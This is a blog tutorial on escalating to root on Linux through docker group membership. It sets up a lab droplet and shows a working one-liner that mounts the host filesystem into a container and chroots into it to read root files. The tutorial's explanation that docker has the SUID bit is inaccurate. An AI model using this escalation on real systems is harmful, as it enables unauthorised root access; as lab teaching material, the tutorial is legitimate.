Privilege escalation with Docker // Keiran.SCOT

Today we are going to learn how to Elevate our Privileges in a Linux system using Docker.

Docker

What is Docker?

Docker is a set of platform as a service products that uses OS-level virtualization to deliver software in packages called containers. Containers are isolated from one another and bundle their own software, libraries and configuration files; they can communicate with each other through well-defined channels.

How does docker lead to privesc

When an admin allows an un-privileged user access to the ‘docker’ group it allows us to make use of the docker CLI to create containers. Because docker runs with the SUID bit set we can use this to abuse the file system and elevate our privileges on out target

Before we continue

In order to continue we need to create a vulnerable host machine.

DO NOT DO THIS ON A MACHINE YOU DON’T HAVE PERMISSIONS TO COMPROMISE

To create a vulnerable host I created a Droplet on Digital ocean use This Link for $100 free credit.

Create a new Droplet with 2GB Ram using Debian
SSH to our new droplet
Install docker-ce using this guide

Now we need to add an unprivileged user

root@target:~# adduser affix
Adding user ‘affix’ …
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
Adding new group `useless’ (1002) …
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
Adding new user ‘affix’ (1002) with group ‘affix’ …
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
Creating home directory `/home/affix’ …
Copying files from `/etc/skel’ …
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
Changing the user information for affix
Enter the new value, or press ENTER for the default
 Full Name []: 
 Room Number []: 
 Work Phone []: 
 Home Phone []: 
 Other []: 
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
Is the information correct? [Y/n]

Now add the new user to the docker group

usermod -aG docker affix

Now ssh to the target with the new user

Checking our access

Before we go further lets check we have access to the docker group.

affix@target:~$ id
uid=1001(affix) gid=1001(affix) groups=1001(affix),999(docker)

Since we have access to the docker group lets try running the hello-world container

affix@target:~$ docker run hello-world
Hello from Docker!
This message shows that your installation appears to be working correctly.
To generate this message, Docker took the following steps:
1. The Docker client contacted the Docker daemon.
2. The Docker daemon pulled the “hello-world” image from the Docker Hub. (amd64)
3. The Docker daemon created a new container from that image which runs the executable that produces the output you are currently reading.
4. The Docker daemon streamed that output to the Docker client, which sent it to your terminal.
> To try something more ambitious, you can run an Ubuntu container with:
> $ docker run -it ubuntu bash
Share images, automate workflows, and more with a free Docker ID:
https://hub.docker.com/
For more examples and ideas, visit:
https://docs.docker.com/get-started/

Success! We can run containers, lets move on

Reading Files

Docker can be used to read files on our taget machine, This is useful to quickly grab file contents (for example quick flag grabbing). This can be done by mounting the directory you want to read from and reading the file

2590d7e9e24c67f41b485f16e2796b3d0e3128379b81e6ca290d67e99376e794

So what exactly did this do?

By using the -v flag we specified a volume to mount, in this case the */root *directory on the host was mounted to the /mnt directory on the container. Because docker has SUID we were able to mount a root owned directory in our container!

Lets get full root system access

Just like reading files we can mount the full file system of the host to gain access to the full system then chroot to gain full privileges on the host.

affix@target:~$ docker run -it -v /:/mnt alpine chroot /mnt
root@e63d48d18e03:/# ls /root/
flag.txt
root@e63d48d18e03:/# cat /root/flag.txt
2590d7e9e24c67f41b485f16e2796b3d0e3128379b81e6ca290d67e99376e794
root@e63d48d18e03:/# cat /etc/issue
Debian GNU/Linux 9 \n \l

As you can see we have full access to the system because we used chroot on the /mnt diectory, This essentially allowed us to use the host operating system!